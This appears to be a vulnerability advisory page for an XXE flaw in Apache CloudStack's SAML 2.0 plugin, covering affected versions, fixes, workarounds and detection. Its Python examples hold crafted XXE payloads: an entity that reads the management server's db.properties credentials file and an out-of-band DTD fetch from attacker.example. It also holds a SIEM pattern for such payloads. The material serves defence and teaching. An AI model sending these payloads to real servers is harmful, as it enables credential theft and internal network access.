CVE-2022-35741

9.8 CRITICAL

📋 TL;DR

Apache CloudStack 4.5.0 through 4.16.1.0, and 4.17.0.0, contain an XML external entity (XXE) injection vulnerability in the SAML 2.0 authentication (Service Provider) plugin: SAML messages delivered to the management server are parsed by an XML processor that resolves external entities. An attacker who can reach the SAML endpoints could read files on the management server, cause denial of service, or perform server-side request forgery from it. Only deployments with the SAML 2.0 plugin enabled are affected; the plugin is disabled by default. Fixed in 4.16.1.1 and 4.17.0.1.

💻 Affected Systems

Products:
  • Apache CloudStack
Versions: 4.5.0 through 4.16.1.0, and 4.17.0.0 (fixed in 4.16.1.1 and 4.17.0.1)
Operating Systems: All platforms running affected CloudStack versions
Default Config Vulnerable: ✅ No
Notes: The vulnerability is only reachable when the SAML 2.0 authentication plugin is enabled (global setting saml2.enabled). The plugin is disabled by default.

📦 What is this software?

Apache CloudStack is an open-source infrastructure-as-a-service (IaaS) platform that orchestrates compute, storage and network resources across hypervisor pools (KVM, VMware vSphere, XenServer/XCP-ng and others) through a central management server with a web UI and an HTTP API. The SAML 2.0 plugin lets that management server act as a SAML Service Provider so users can log in through an external identity provider.

⚠️ Risk & Real-World Impact

🔴 Worst Case

Compromise of the CloudStack management server: arbitrary file read of management-server configuration such as /etc/cloudstack/management/db.properties (database connection settings and credentials), SSRF from the management server against internal systems it can reach (hypervisor hosts, storage, internal metadata services), and denial of service through entity expansion or external-entity fetches that never return.

🟠 Likely Case

Unauthenticated read of files the management-server process can access (configuration, credentials, keys), exfiltrated through attacker-controlled external entities. The document has to be parsed before its XML signature can be checked, so no valid IdP session or signing key is needed.

🟢 If Mitigated

No impact if the SAML 2.0 plugin is disabled (saml2.enabled=false), the patched release is installed, or the XML parser refuses DTDs and external entities.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: UNKNOWN
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Exploitation requires the SAML 2.0 plugin to be enabled and network access to the management server's SAML endpoints (in a default deployment the Assertion Consumer Service is the API endpoint /client/api?command=samlSso, which accepts the IdP's SAMLResponse). The attacker posts a crafted SAMLResponse; because the XML must be parsed before its signature can be verified, no identity-provider key, account or session is needed.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 4.16.1.1 (4.16 branch) and 4.17.0.1 (4.17 branch), and all later releases

Vendor Advisory: https://lists.apache.org/thread/hwhxvtwp1d5dsm156bsf1cnyvtmrfv3f

Restart Required: Yes

Instructions:

1. Upgrade to Apache CloudStack 4.16.1.1 (4.16.x branch) or 4.17.0.1 (4.17.x branch), or any later release.
2. Restart the cloudstack-management service on every management server.
3. Verify SAML 2.0 login against the IdP if the plugin is in use.

🔧 Temporary Workarounds

Disable SAML 2.0 Plugin

Applies to: all platforms

Disable the vulnerable SAML 2.0 authentication plugin if it is not required; local and LDAP logins are not affected by this vulnerability.

Set the global setting saml2.enabled to false (Global Settings in the UI, or the updateConfiguration API) and restart the management server so the SAML authenticator is taken out of the login path.

Implement XML Parsing Controls

Applies to: all platforms

If you build the plugin yourself and cannot upgrade, configure the XML parser used for SAML messages to refuse DTDs and never resolve external entities.

Set the SAX parser features: setFeature("http://xml.org/sax/features/external-general-entities", false); setFeature("http://xml.org/sax/features/external-parameter-entities", false); and, since a SAML message never needs a DTD, setFeature("http://apache.org/xml/features/disallow-doctype-decl", true).
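
The control above, as an added example that is not code from CloudStack or from the advisory: Python's xml.sax exposes the same SAX feature URIs as the Java parser the plugin uses, so the same two features are switched off. The parser first runs with external general entities enabled (the vulnerable shape) against a constructed SAML-style response whose NameID expands an entity pointing at a temporary file standing in for db.properties, then in the hardened form that rejects any DOCTYPE and keeps both external-entity features off. The SAML envelope and the secret file are constructed for the example.

```python
"""Added example, not CloudStack or advisory code: XXE through a SAML-style
response, parsed once with external general entities enabled and once
hardened. The SAX feature URIs are the same ones the Java parser uses."""
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import (ContentHandler, feature_external_ges,
                             feature_external_pes)


class NameIdCollector(ContentHandler):
    """Collects the text of <NameID>, as a consumer of the assertion would."""

    def __init__(self):
        super().__init__()
        self._in_nameid = False
        self.name_id = ""

    def startElement(self, name, attrs):
        if name.endswith("NameID"):
            self._in_nameid = True

    def endElement(self, name):
        if name.endswith("NameID"):
            self._in_nameid = False

    def characters(self, content):
        if self._in_nameid:
            self.name_id += content


def saml_response_with_xxe(secret_path: str) -> bytes:
    """Constructed SAML-style response: the DOCTYPE declares an external
    entity pointing at a local file, and NameID expands it."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE Response [<!ENTITY xxe SYSTEM "{secret_path}">]>\n'
        '<saml2p:Response xmlns:saml2p="urn:oasis:names:tc:SAML:2.0:protocol"'
        ' xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion">'
        '<saml2:Assertion><saml2:Subject>'
        '<saml2:NameID>&xxe;</saml2:NameID>'
        '</saml2:Subject></saml2:Assertion></saml2p:Response>'
    ).encode()


def parse_unsafely(xml_bytes: bytes) -> str:
    """Vulnerable shape: the parser fetches external general entities,
    so the file content lands in NameID."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, True)   # the dangerous setting
    handler = NameIdCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return handler.name_id


def parse_hardened(xml_bytes: bytes) -> str:
    """Hardened shape: refuse any DTD up front (a SAML message never needs
    one) and keep both external-entity features off."""
    if b"<!DOCTYPE" in xml_bytes:
        raise ValueError("DOCTYPE declaration rejected: possible XXE")
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, False)
    parser.setFeature(feature_external_pes, False)
    handler = NameIdCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return handler.name_id


def demo() -> dict:
    """Feed the same payload to both parsers; reports what each yielded."""
    # Constructed stand-in for /etc/cloudstack/management/db.properties.
    with tempfile.NamedTemporaryFile("w", suffix=".properties",
                                     delete=False) as f:
        f.write("db.cloud.password=s3cret")
        secret_path = f.name
    try:
        payload = saml_response_with_xxe(secret_path)
        leaked = parse_unsafely(payload)
        try:
            parse_hardened(payload)
            blocked = False
        except ValueError:
            blocked = True
        return {"leaked": leaked, "blocked": blocked}
    finally:
        os.unlink(secret_path)


if __name__ == "__main__":
    print(demo())
```

Rejecting the DOCTYPE outright is the stronger control: it also stops entity-expansion denial of service and parameter-entity tricks that the two external-entity features alone do not cover.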

🧯 If You Can't Patch

  • Disable the SAML 2.0 authentication plugin immediately (saml2.enabled=false, then restart the management server)
  • Restrict network access to the management server's API port so that only the identity provider and trusted administrative networks can reach the SAML endpoints
  • Egress-filter the management server so that external-entity fetches to attacker-controlled hosts (out-of-band exfiltration) fail

🔍 How to Verify

Check if Vulnerable:

A deployment is vulnerable when both of the following hold:

1. The management server runs 4.5.0 through 4.16.1.0, or 4.17.0.0.
2. The global setting saml2.enabled is true (Global Settings in the UI, or listConfigurations with name=saml2.enabled).

Check Version:

rpm -q cloudstack-management (RPM-based hosts) or dpkg -s cloudstack-management (Debian/Ubuntu hosts) on the management server; remotely, the cloudstackversion field of the listCapabilities API response.

Verify Fix Applied:

Verify the reported version is 4.16.1.1 or later on the 4.16 branch, or 4.17.0.1 or later, and test SAML authentication against the IdP if the plugin is in use.
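
The two checks above, combined into one decision, as an added example that is not part of the advisory or of CloudStack. It reads the version and the saml2.enabled value out of JSON shaped like the listCapabilities and listConfigurations API responses (the samples are constructed) and applies the per-branch fix versions from the advisory; the outcome strings are the example's own.

```python
"""Added example, not part of the advisory or of CloudStack: decide whether a
management server is exposed to CVE-2022-35741 from its version and the
saml2.enabled global setting. The JSON samples are constructed in the shape of
CloudStack's listCapabilities and listConfigurations API responses."""
import json

FIRST_AFFECTED = (4, 5, 0, 0)
# First fixed build on each maintenance branch (from the Apache advisory);
# every branch after 4.17 was released with the fix already in it.
FIXED_FROM = {(4, 16): (4, 16, 1, 1), (4, 17): (4, 17, 0, 1)}
FIRST_CLEAN_BRANCH = (4, 18, 0, 0)


def parse_version(text: str) -> tuple:
    """'4.16.1.0' -> (4, 16, 1, 0); '4.17.0.0-SNAPSHOT' -> (4, 17, 0, 0).
    Short strings are right-padded with zeros so tuples compare cleanly."""
    core = text.strip().split("-")[0]
    parts = tuple(int(p) for p in core.split("."))
    return parts + (0,) * (4 - len(parts))


def version_is_fixed(v: tuple) -> bool:
    """True when the build carries the XXE fix."""
    branch = v[:2]
    if branch in FIXED_FROM:
        return v >= FIXED_FROM[branch]
    return v >= FIRST_CLEAN_BRANCH


def assess(version: str, saml2_enabled: bool) -> str:
    """Four outcomes; only the last one is exploitable right now."""
    v = parse_version(version)
    if v < FIRST_AFFECTED:
        return "not affected: release predates the SAML 2.0 plugin"
    if version_is_fixed(v):
        return "fixed"
    if not saml2_enabled:
        return "unpatched but not exposed: SAML 2.0 plugin disabled (still upgrade)"
    return "VULNERABLE: SAML 2.0 plugin enabled on an unpatched build"


def assess_from_api(capabilities_json: str, configurations_json: str) -> str:
    """Pull the two facts out of API responses
    (listCapabilities and listConfigurations name=saml2.enabled)."""
    caps = json.loads(capabilities_json)["listcapabilitiesresponse"]["capability"]
    confs = json.loads(configurations_json)["listconfigurationsresponse"]
    enabled = any(
        c.get("name") == "saml2.enabled" and str(c.get("value", "")).lower() == "true"
        for c in confs.get("configuration", [])
    )
    return assess(caps["cloudstackversion"], enabled)


# Constructed sample responses in the documented response shape.
SAMPLE_CAPABILITIES = json.dumps({
    "listcapabilitiesresponse": {"capability": {"cloudstackversion": "4.16.1.0"}}
})
SAMPLE_CONFIGURATIONS = json.dumps({
    "listconfigurationsresponse": {
        "count": 1,
        "configuration": [{"name": "saml2.enabled", "value": "true"}],
    }
})

if __name__ == "__main__":
    print(assess_from_api(SAMPLE_CAPABILITIES, SAMPLE_CONFIGURATIONS))
```

The branch-aware comparison matters: 4.16.1.1 is fixed while the numerically larger 4.17.0.0 is not, so a plain "newer than X" check gets one of the two branches wrong.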

📡 Detection & Monitoring

Log Indicators:

  • XML parsing errors (SAXParseException and similar) logged by the management server while handling SAML requests
  • Multiple failed SAML authentication attempts, especially from sources that are not the configured identity provider
  • Unexpected file reads by the management-server Java process (auditd or file-integrity telemetry on the management host)

Network Indicators:

  • SAMLResponse or SAMLRequest parameters that decode to XML containing a DOCTYPE or ENTITY declaration
  • Outbound connections from the management server to unexpected hosts, including DTD or entity fetches to attacker-controlled servers and requests to internal services it does not normally contact

SIEM Query:

source="cloudstack" AND message="*SAML*" AND (message="*SAXParseException*" OR message="*DOCTYPE*" OR message="*ENTITY*")

The terms are a starting point: the plugin's exact log messages vary by release, and matching on bare "*XML*" produces far too much noise on a management server.
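
The network indicator above, turned into detection logic, as an added example that is not from the advisory or CloudStack. It consumes captured form bodies or query strings (a WAF or IDS audit log that records POST data; plain access logs do not carry the SAMLResponse), decodes the SAML parameter for both the HTTP-POST and HTTP-Redirect bindings, and flags any DTD, entity declaration or parameter-entity reference, none of which a legitimate SAML message contains. The records, addresses and payloads are constructed; the attacker.example host and the db.properties path are the example's own.

```python
"""Added example, not from the advisory or CloudStack: flag XXE indicators in
SAML messages reaching the Service Provider. Input is captured form bodies or
query strings; all records below are constructed."""
import base64
import re
import urllib.parse
import zlib

# A legitimate SAML message never contains a DTD, an entity declaration or
# a parameter-entity reference.
XXE_MARKERS = re.compile(rb"<!DOCTYPE|<!ENTITY|%[A-Za-z_][\w.-]*;", re.IGNORECASE)


def decode_saml_param(value: str) -> bytes:
    """Decode a SAMLResponse/SAMLRequest value: base64 (HTTP-POST binding),
    plus raw DEFLATE when it came via the HTTP-Redirect binding."""
    raw = base64.b64decode(value)
    if raw.lstrip().startswith(b"<"):
        return raw
    try:
        return zlib.decompress(raw, -15)
    except zlib.error:
        return raw


def xxe_indicators(xml_bytes: bytes) -> list:
    """Distinct markers found, sorted; an empty list means clean."""
    return sorted({m.group(0).decode("ascii", "replace")
                   for m in XXE_MARKERS.finditer(xml_bytes)})


def scan_records(records: list) -> list:
    """records: (client_ip, url-encoded body or query string) pairs.
    Returns one alert per SAML parameter carrying XXE markers."""
    alerts = []
    for client_ip, data in records:
        params = urllib.parse.parse_qs(data, keep_blank_values=True)
        for name in ("SAMLResponse", "SAMLRequest"):
            for value in params.get(name, []):
                try:
                    xml_bytes = decode_saml_param(value)
                except ValueError:          # not base64 at all
                    continue
                found = xxe_indicators(xml_bytes)
                if found:
                    alerts.append({"client": client_ip, "param": name,
                                   "markers": found})
    return alerts


# --- constructed samples ---------------------------------------------------
def post_body(xml: bytes) -> str:
    """Form body as the HTTP-POST binding sends it."""
    return urllib.parse.urlencode({"SAMLResponse": base64.b64encode(xml).decode()})


def redirect_query(xml: bytes) -> str:
    """Query string as the HTTP-Redirect binding sends it (deflate + base64)."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    deflated = c.compress(xml) + c.flush()
    return urllib.parse.urlencode({"SAMLRequest": base64.b64encode(deflated).decode()})


CLEAN = (b'<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol">'
         b'<saml:Assertion xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">'
         b'<saml:Subject><saml:NameID>alice</saml:NameID></saml:Subject>'
         b'</saml:Assertion></samlp:Response>')
XXE_FILE = (b'<?xml version="1.0"?><!DOCTYPE Response [<!ENTITY xxe SYSTEM '
            b'"file:///etc/cloudstack/management/db.properties">]>'
            b'<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol">'
            b'<saml:Assertion xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">'
            b'<saml:Subject><saml:NameID>&xxe;</saml:NameID></saml:Subject>'
            b'</saml:Assertion></samlp:Response>')
XXE_OOB = (b'<?xml version="1.0"?><!DOCTYPE r [<!ENTITY % dtd SYSTEM '
           b'"http://attacker.example/evil.dtd"> %dtd;]><r/>')

SAMPLE_RECORDS = [
    ("203.0.113.10", post_body(CLEAN)),
    ("198.51.100.7", post_body(XXE_FILE)),
    ("198.51.100.7", redirect_query(XXE_OOB)),
]

if __name__ == "__main__":
    for alert in scan_records(SAMPLE_RECORDS):
        print(alert)
```

Matching on the decoded XML rather than the raw request is the point: the SAMLResponse is base64 (and, on the Redirect binding, deflated) on the wire, so a SIEM string match on the raw log line never sees the DOCTYPE.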

🔗 References

  • Apache CloudStack security advisory for CVE-2022-35741: https://lists.apache.org/thread/hwhxvtwp1d5dsm156bsf1cnyvtmrfv3f
  • NVD entry: https://nvd.nist.gov/vuln/detail/CVE-2022-35741
